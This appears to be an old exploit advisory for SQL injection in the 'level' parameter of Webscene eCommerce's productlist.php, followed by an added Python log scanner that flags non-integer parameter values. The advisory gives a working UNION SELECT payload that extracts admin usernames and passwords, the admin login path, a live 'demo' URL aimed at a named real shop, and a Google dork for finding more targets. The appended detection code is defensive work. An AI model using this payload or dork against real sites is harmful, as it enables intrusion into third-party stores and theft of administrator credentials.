############################################
Webscene eCommerce (level) Remote SQL Injection
vendor : http://www.webscenesolutions.com/ecommerce-shopping-websites-edinburgh.htm
#############################################
Bug Found By :Angela Chang (12-10-2008)
contact: angel@ch4ng.cc
#######################################
Greetz: nyubi & Vrs-Chk
especially thx to str0ke @ milw0rm.com
############################################
vuln file : productlist.php
Input passed to the "level" parameter is not properly verified
before being used. This can be exploited to perform
remote SQL injection.
exploit : http://somehost/productlist.php?categoryid=20&level=[sql]
http://somehost/productlist.php?categoryid=20&level=-4 union select concat(loginid,0x2f,password) from adminuser--
Login admin : http://somehost/admin/
Demo Site : http://www.abcbeautyshop.co.uk/productlist.php?categoryid=20&level=-4%20union%20select%20concat(loginid,0x2f,password)%20from%20adminuser--
Google dork : inurl:productlist.php?categoryid= level
#############################################
http://www.securityfocus.com/archive/1/497324/30/0/threaded
My first bug, hehehe. The first time I studied SQL, and this is the bug I got...
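
Added example (not part of the original advisory or the vendor's code): a Python check that flags access-log requests to productlist.php whose "categoryid" or "level" value is not a plain integer, which is the verification the advisory says is missing. The log lines, client addresses and the assumption that both parameters are integers are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: both parameters are meant to be plain integers, as in the
# values shown in the advisory (categoryid=20, level=-4).
INT_PARAMS = ("categoryid", "level")
INT_RE = re.compile(r"-?\d{1,10}")
# Request line of a common/combined-format access log entry. The lazy match
# also copes with clients that send unencoded spaces in the URL.
REQ_RE = re.compile(r'"(?:GET|POST|HEAD) (.+?) HTTP/[\d.]+"')

# Constructed sample log lines (documentation-range addresses).
SAMPLE_LOG = [
    '192.0.2.10 - - [12/Oct/2008:10:01:02 +0000] "GET /productlist.php?categoryid=20&level=2 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [12/Oct/2008:10:03:40 +0000] "GET /productlist.php?categoryid=20&level=-4%20union%20select%20concat(loginid,0x2f,password)%20from%20adminuser-- HTTP/1.1" 200 734',
    '192.0.2.10 - - [12/Oct/2008:10:04:11 +0000] "GET /index.php HTTP/1.1" 200 2048',
]


def is_strict_int(value):
    """True only if the whole value is an optionally signed decimal integer."""
    return INT_RE.fullmatch(value) is not None


def check_request(target):
    """Return the productlist.php parameters whose values are not integers."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith("/productlist.php"):
        return []
    # parse_qs URL-decodes the values, so %20 and + are compared as spaces.
    params = parse_qs(parts.query, keep_blank_values=True)
    return [name for name in INT_PARAMS
            if any(not is_strict_int(v) for v in params.get(name, []))]


def scan(lines):
    """Yield (line_number, client_ip, bad_params) for each suspicious line."""
    for n, line in enumerate(lines, 1):
        m = REQ_RE.search(line)
        if m:
            bad = check_request(m.group(1))
            if bad:
                yield n, line.split(" ", 1)[0], bad


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

The same strict-integer test belongs in the application before the value reaches the query, together with a parameterized statement.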